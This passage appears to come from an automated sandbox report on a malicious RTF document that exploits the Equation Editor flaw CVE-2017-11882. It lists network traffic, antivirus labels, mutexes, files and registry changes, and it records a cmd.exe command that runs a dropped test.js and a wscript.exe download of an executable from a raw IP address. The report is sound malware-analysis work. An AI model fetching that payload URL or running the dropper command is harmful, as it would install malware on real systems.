x1a'\\xd2j\\xc5\\xfb\\xbfi\\xa0\\x82\\xcep\\xc9\\x9e\\x93\\xea\n\\x9e:\\x1e\\x98n"
  524.  
  525.  
  526. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\\xea\\x95\\xf6t\\x08t\\x7f'\\x95\\x02|\\x04pb\\xce\\xeew0*id`6\\x8a1\\xdbi0/d\\xaa\\x91\\x12\\x0b\\x08\\x82\\xc0\\xfbv\\xd7p\\x14\\xb4\\x88\\x98 j\\xc0<\\xf1\\x06\\xc5:m\\xa6\\xb4\\xf2\\xf8\t\\xff\\xe3\\xaa\\x82bk\\xd7\\x17\\x8e\\x80\\xe4\\x12l\\xf40\\x87\\x17\\x17\\x1a\\x93.\\x8auz\\xc4d\t\\x9c\\xf7\\x12\\xaa=\\xf7c(\\xedm\\x1d\\xde\\xa7\\x15?\\xa9\\xf5\\x19j\\xf49\\xd0u%\\xbf\\xec\\x9f\\xd8\\xd8\\x8ctj~8h=x\\xc0\\xae\\xdc\\xa3\\xa7\\x02\\x11\\x1f\\xd9\\xe0;\\xe4\ng\\xd7\\x02\\x9cy+\\xad\\xfd\\xa2\\xe6\\x9d'p\\xb1\\xd1\\xbb\\xc2\\xf9\\xda\\xf6\\x07\\xa26\\xa6\\x93x\\xaac\\xbc%\\xc0~f\\xee\\xb1\\xfc\\xd7\\x07yt\\x89h\\xe8\\x84l\\x90q6\\x1d\\x85\\xa8\\x13\\xa4\\x1f\\xf8\\xec\\xab\\xfc\\xcd\\xeb\\x84*\\xb1\\x0b\\xd9\\xd1\\xf4\\xe9\\x12\\xf2q\\xbc\\x12\\xfe\\xf8;\\xc9\\xde\\x15v\\x01n\\x96\\x9b\\xe6\\xfc\\xf9\\xaar\\xc31\\x13\\xd3\\xd7vf\\xf9\\xc95\\x01\\xe2q#\\x19\\x98)6\\xa0\\xd8\\xd5"
  527.  
  528.  
  529. "http_request": "winword.exe_WSASend_\\xc4\\x00n\\x00\\x083#\\x11,9\\x03\\x96e\\xc4d\\xc1\\xd4\\xce\\x10\\x9a1\\x1c\\xe5`\\xcc1\\x98\\x8d\\x0f\\xfb\\xb6\\xad\\x1c/\\x95\\x07\\xc3\\x94<+bg\\x0b\\xa1-\\xa3\\xb0\\x13\\xa5\\x9d\\x8ef\\xc4g\\xb5\\x83\\x8b\\x8e$*\\x19\\xd8yx\\xbdb\\xb9\\xfe\\x1f(y\\x1b_\\xb2\\xa9\\x9c\\xa1q\\xf7g\t\\x91\n\\xf9\\xd5\t\\xc4\\xb7\\xc4r`^bc8\\xc9\\x9268\\x04\\\\xd9\\x9d\\xd0\\x83\\x1eo b\n\\xcc\\x15\\xbbkj\\xa8x\\xe6\\x1b\\xbe\\x1a\t>~\\x13\\xff\\x0e\\x8cq\\xd8\\x05\\xcb\\x0f\\xb1\\x8c\\xe7\\x94\\x88i\\x81\\x9e\\xec\\x17\\xac\t\\x84\\x8bz\\xcd\\x99\\x9f\\xd9\\xe2!\\xf5\\xda\\xa5\\x9am\\xddxm\\x19\\xd3\\xf4\\xf4\\x97\\xb8\\xa8\\xfe\\xf8\\xa8\\x19\\x10\\x8d\\xce$\\x9d\\xe54\\xeaz\\xfd\\xd3\\xc8\\xf1\\xf3\\x98'\\x11\\xee\\x16\\xf8\\xb0\\x17/\\xf5|dl\\xc95\\x0f\\x0fn@\\x7fi\\xa4p+:hl\\x93sz\\x88\\x02\\xa9w\\xb9\\xb8\\xff\\xbe\\xe7~\\xfdnc\\xb6\\xcfp\\x8f\\x12\\x11\\xfb\\x83\\xf6z\\x84\\x04\\xf6\\xe9\\x0fo\\xf1qvyy\\xa2\\x80xc"
  530.  
  531.  
  532. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa0\\xcd\\x7f&k\\xee\\xf8\\xb1p\\xc1\\x06\\x83\\xab\r\\xcc\\x0e\"\\xb4\\xad\\xc8\\xbfv\\xb9\\xf3\\xf3\\xf4\\xd6\\x18$\\xc0\\x9ek\\x06(|g\\x84\\xe1s|\\xb0h\\xc9\\xc1e'ix\\xa1\\xbe\\xf3\\x98;c\\xd6v\\x15y\\x10\\xdc\r$j\\xd4b\\x11\\xad\\xdf\\x8c\\x84\\x11\\x13gp\\xc6_\\x90\\x10\\x80d\\xa7\\xfe\\xd6\\xfft3\\xf8i:3\\xa8?\"mr\\xdf\\x96\\xd1g\\xfb\\xe3\\x1a\\xb7\\xcb\\xc98\\xb8\\x1ex\"\r\\xf4\\xb4\\xb7p:\\xfa\\xa1\\x97\\x15\\x18k\nu)\\xbb\\xb3*t\\xee\\xeay\\xce\\xf3\\xbc\\x94\\xa2m\\xf6\\xdbce\\xec\\xb2-eg\\xeeh\\xaf0\\xbcx\\x10\\xf4\\xd6n\\xddv)\\xe6i\\x16\\xc9rz\\xf7\\x05\\xf9\\xf2\\xea\\xb6\\xff+\\x08\\x94\\xdc\\x00-^\\xfdf\\xeei\\x04\\xd1z\\xa2 r\\xec\\x0cq<\\x90\\xee~n\\xf0yd9\\x0e\\xf2\\xb4\\xe0\\xe8d\\x0b%z\\xf2 \\x0ba\\xb6p\\x9d\\xdb\\x9a\r\\xfb\\x9a\\xb1lx\\xa3\\x8a\\xa7\\xe8^6\\xd2\\x0e\\xb9g\\x86\\xb85\\xc1\\x8b\\x98\\x9f\\x06\\xa1\\xfa\\xd4\\x9e"
  533.  
  534.  
  535. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xce\\xe9\\\\xb1\\x06n\\xe1\\x8f\\x8ccy8\n\\xea\\xc0nq\\xf1\\xf2\\x10*v\\xee\\x12k\\xaa.\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  536.  
  537.  
  538. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x043)3#\\xbd\\x81\\x87\\xbd\\x9b\\x11\\xf1\\x16~\\xa09\\x90\\x8c\\xa9\\xac\\x18\\xa4j\\xbf\\xf0\\xe6c\\x14\\x9a\\x0cbq\\x8f;4\\xbf\\x0f\\xdbcj\\xc6\\xa6w\\x12\\xff5\\xf6`\\xad\\xeek$\\xae\\xe2;\\x12h\\x94\\xcc\\xe9f7\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf6\\xb5\\x0e\\xf7\\xb3\\xfb\\xe2/v\\xd2\\xb5\\xac$k\\x97\\x85\\x9a\\xd3\\xc4,x\\xa2pfe\\x16\\xb2\\x86&\\xf6l\\xa6\\xc9o\\xbe\\x94\\x8d\\x98\\xa7\\xbe\\xb3\\xe2\\xb5q"
  539.  
  540.  
  541. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5<\\xfe\\x10\nz|\\xfe\\x04 4n6\\x0e\\x9e\\xecu\\xca\\x95\\xa9g\\xa5\\x9a\\x9f>o\\xa12\\x85\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  542.  
  543.  
  544. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5,\\xeel(\\xb2mm\\xb3\\x7f\\xe1\\xefz\\xc8u\\xc4\\xe3%t\\xf39\\x9fi\\xcc)8z\\x10\\xda\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  545.  
  546.  
  547. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9d\\x9c?\\xbba\\xd9\\xb8\\xd1\\x1e\\xa6\\xee\\xa1\\xc8\\x82\\xed\\x8esi\\xa9\\xb3\\xe6\\xb2\\xd5\\x07zn\\xfd\\xa1b\\xce\\xbb\\xd7(:\\x8d\\xdcz\\xfe\\xa7\\x1eh-b\\1\\xc1\\xdaq\\xe0\\x9ay\\x11o\\x90o\\xc5\\xa4i;%\\x7f\\xda/\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t\\xa9\\xfa\\xc9\\xe0t\\x98w\\xee\\xa1\\xc5\\xdd\\xb8w5yy\\xd5m\\x93< \\xe9h\\x0f\\xc6l\\x8c\\x89&\\xc4\rs\\x9ao\\xbcuah\\xe5\\\\x9di\\x86\\x00\\xaa7"
  548.  
  549.  
  550. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x98f\\xedkz\\xf8\\x0f\\xa4\\x04<\\xe1)2\\xaf\\x93\\xc7\\xb5\\x1e9\\xdd5\\x10\\x91t\\x8ay\\xee\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  551.  
  552.  
  553. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xac$\\x0e\\x16\\xe8\\x9d7'\\x8c\\x0b\\xe8\\xefd\\xd7w\\xfb\\xc7\\xe8\\xd4.\\x16\\xee\\x9c\ng\\x08\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  554.  
  555.  
  556. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5wv\\xdd\\xe0\\xb0uuy\\xf6\\xac\\xc9\\x18\\xb1\\xf8\\x9a\\xf3\\x17\\xae\\xda\\x18v\\xcd\\xae\\xa1\\x9c:\\x80\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  557.  
  558.  
  559.  
  560.  
  561. "Description": "The EQNEDT32 (Equation Editor) process created a child process, which is likely indicative of the CVE-2017-11882 Office exploit",
  562. "Details":
  563.  
  564. "created_process": "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC"
  565.  
  566.  
  567.  
  568.  
  569. "Description": "Stack pivoting was detected when using a critical API",
  570. "Details":
  571.  
  572. "process": "EQNEDT32.EXE:3044"
  573.  
  574.  
  575.  
  576.  
  577. "Description": "Creates a hidden or system file",
  578. "Details":
  579.  
  580. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$xObOXUJYS.doc"
  581.  
  582.  
  583. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
  584.  
  585.  
  586.  
  587.  
  588. "Description": "A wscript.exe process, commonly used in script or document file downloaders, initiated network activity",
  589. "Details":
  590.  
  591. "http_request": "wscript.exe_InternetCrackUrlW_http://45.11.19.145/mswiner.exe"
  592.  
  593.  
  594. "http_request_path": "wscript.exe_HttpOpenRequestW_/mswiner.exe"
  595.  
  596.  
  597. "http_request": "wscript.exe_InternetCrackUrlA_http://45.11.19.145"
  598.  
  599.  
  600.  
  601.  
  602. "Description": "File has been identified as malicious by 41 antivirus engines on VirusTotal",
  603. "Details":
  604.  
  605. "MicroWorld-eScan": "Exploit.EXE-Dropper.Gen"
  606.  
  607.  
  608. "FireEye": "Exploit.EXE-Dropper.Gen"
  609.  
  610.  
  611. "CAT-QuickHeal": "Exp.RTF.CVE-2017-11882.L"
  612.  
  613.  
  614. "McAfee": "Exploit-CVE2017-11882.b"
  615.  
  616.  
  617. "K7AntiVirus": "Trojan ( 0051f3601 )"
  618.  
  619.  
  620. "K7GW": "Trojan ( 0051f3601 )"
  621.  
  622.  
  623. "Arcabit": "Exploit.EXE-Dropper.Gen"
  624.  
  625.  
  626. "Baidu": "Win32.Exploit.CVE-2017-11882.t"
  627.  
  628.  
  629. "Symantec": "Exp.CVE-2017-11882!g3"
  630.  
  631.  
  632. "ESET-NOD32": "Win32/Exploit.CVE-2017-11882.G"
  633.  
  634.  
  635. "TrendMicro-HouseCall": "Trojan.W97M.CVE201711882.SMAL02"
  636.  
  637.  
  638. "Avast": "OLE:CVE-2017-11882 Expl"
  639.  
  640.  
  641. "ClamAV": "Rtf.Exploit.CVE_2017_11882-6584355-0"
  642.  
  643.  
  644. "Kaspersky": "HEUR:Trojan-Downloader.Script.Generic"
  645.  
  646.  
  647. "BitDefender": "Exploit.EXE-Dropper.Gen"
  648.  
  649.  
  650. "NANO-Antivirus": "Exploit.OleNative.CVE-2017-11882.evenbv"
  651.  
  652.  
  653. "Tencent": "Exp.MSOffice.CVE-2017-11882.b"
  654.  
  655.  
  656. "Ad-Aware": "Exploit.EXE-Dropper.Gen"
  657.  
  658.  
  659. "Emsisoft": "Exploit.EXE-Dropper.Gen (B)"
  660.  
  661.  
  662. "Comodo": "Exploit.W97M.CVE2017-11882.BH@82y96x"
  663.  
  664.  
  665. "F-Secure": "Exploit:W97M/CVE-2017-0199.B"
  666.  
  667.  
  668. "TrendMicro": "Trojan.W97M.CVE201711882.SMAL02"
  669.  
  670.  
  671. "McAfee-GW-Edition": "Exploit-CVE2017-11882.b"
  672.  
  673.  
  674. "Sophos": "Exp/201711882-A"
  675.  
  676.  
  677. "Ikarus": "Exploit.CVE-2017-11882"
  678.  
  679.  
  680. "Cyren": "CVE-2017-11882.A.gen!Camelot"
  681.  
  682.  
  683. "Jiangmin": "Heur:Exploit.CVE-2017-11882.Gen"
  684.  
  685.  
  686. "Avira": "EXP/CVE-2017-11882.Gen"
  687.  
  688.  
  689. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
  690.  
  691.  
  692. "Microsoft": "TrojanDownloader:JS/Nemucod.ACG"
  693.  
  694.  
  695. "ZoneAlarm": "HEUR:Trojan-Downloader.Script.Generic"
  696.  
  697.  
  698. "GData": "Generic.Exploit.CVE-2017-11882.A"
  699.  
  700.  
  701. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
  702.  
  703.  
  704. "ALYac": "Exploit.CVE-2017-11882.Gen"
  705.  
  706.  
  707. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  708.  
  709.  
  710. "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
  711.  
  712.  
  713. "Yandex": "HTML.Psyme.Gen"
  714.  
  715.  
  716. "MAX": "malware (ai score=89)"
  717.  
  718.  
  719. "Fortinet": "MSOffice/CVE_2018_0802.C!exploit"
  720.  
  721.  
  722. "AVG": "OLE:CVE-2017-11882 Expl"
  723.  
  724.  
  725. "Qihoo-360": "virus.exp.21711882.gen"
  726.  
  727.  
  728.  
  729.  
  730. "Description": "ClamAV hits in Target/Dropped/SuriExtracted",
  731. "Details":
  732.  
  733. "target": "clamav:Rtf.Exploit.CVE_2017_11882-6584355-0, sha256:f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0, type:Rich Text Format data, version 1, ANSI"
  734.  
  735.  
  736. "dropped": "clamav:Rtf.Exploit.CVE_2017_11882-6584355-0, sha256:f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\JvxObOXUJYS.doc, type:Rich Text Format data, version 1, ANSI"
  737.  
  738.  
  739.  
  740.  
  741. "Description": "The RTF file contains an object with potential exploit code",
  742. "Details":
  743.  
  744. "cve": "Object 2 index 000011A8h contains Microsoft Equation 3.0 (known to be related to CVE-2017-11882 or CVE-2018-0802)"
  745.  
  746.  
  747. "cve": "Object 2 index 000033E2h contains Microsoft Equation 3.0 (known to be related to CVE-2017-11882 or CVE-2018-0802)"
  748.  
  749.  
  750.  
  751.  
  752.  
  753. * Started Service:
  754. "osppsvc"
  755.  
  756.  
  757. * Mutexes:
  758. "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
  759. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  760. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  761. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  762. "CicLoadWinStaWinSta0",
  763. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  764. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
  765. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
  766. "Local\\ZoneAttributeCacheCounterMutex",
  767. "Local\\ZonesCacheCounterMutex",
  768. "Local\\ZonesLockedCacheCounterMutex",
  769. "Local\\ZonesCounterMutex"
  770.  
  771.  
  772. * Modified Files:
  773. "C:\\Users\\user\\AppData\\Local\\Temp\\JvxObOXUJYS.doc",
  774. "C:\\Users\\user\\AppData\\Local\\Temp\\~$xObOXUJYS.doc",
  775. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
  776. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF7221C9C8-DA5B-4E58-B242-205AADF71DBF.tmp",
  777. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js",
  778. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS4B7BAF70-0B3D-40A3-AD35-729B08DF661E.tmp",
  779. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\2F40DBDA.wmf",
  780. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  781. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  782. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  783. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  784. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8617.tmp",
  785. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8618.tmp",
  786. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\B62E0613.wmf",
  787. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  788. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of JvxObOXUJYS.asd",
  789. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  790. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
  791. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF2105811FCDF6183D.TMP",
  792. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
  793. "C:\\Users\\user\\AppData\\Local\\Temp\\cabAFC9.tmp",
  794. "C:\\Users\\user\\AppData\\Local\\Temp\\cabAFF8.tmp",
  795. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB019.tmp",
  796. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB029.tmp",
  797. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB04A.tmp",
  798. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06A.tmp",
  799. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06B.tmp",
  800. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06C.tmp",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08D.tmp",
  802. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08C.tmp",
  803. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08E.tmp",
  804. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB09F.tmp",
  805. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB0FD.tmp",
  806. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB12E.tmp",
  807. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  808.  
  809.  
  810. * Deleted Files:
  811. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8617.tmp",
  812. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8618.tmp",
  813. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\B62E0613.wmf",
  814. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  815. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
  816. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of JvxObOXUJYS.asd",
  817. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  818. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
  819. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js"
  820.  
  821.  
  822. * Modified Registry Keys:
  823. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\78",
  824. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
  825. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
  826. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
  827. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
  828. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
  829. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
  830. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
  831. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
  832. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
  833. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
  834. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
  835. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  836. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\packager.dll,-2000",
  837. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  838. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  839. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  840. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  841. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  842. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  843. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  844. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  845. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE",
  846. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE\\1786DBD",
  847. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  848. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
  849. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
  850. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
  851. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  852. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  853. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
  854. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
  855. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
  856. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
  857. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
  858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
  859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
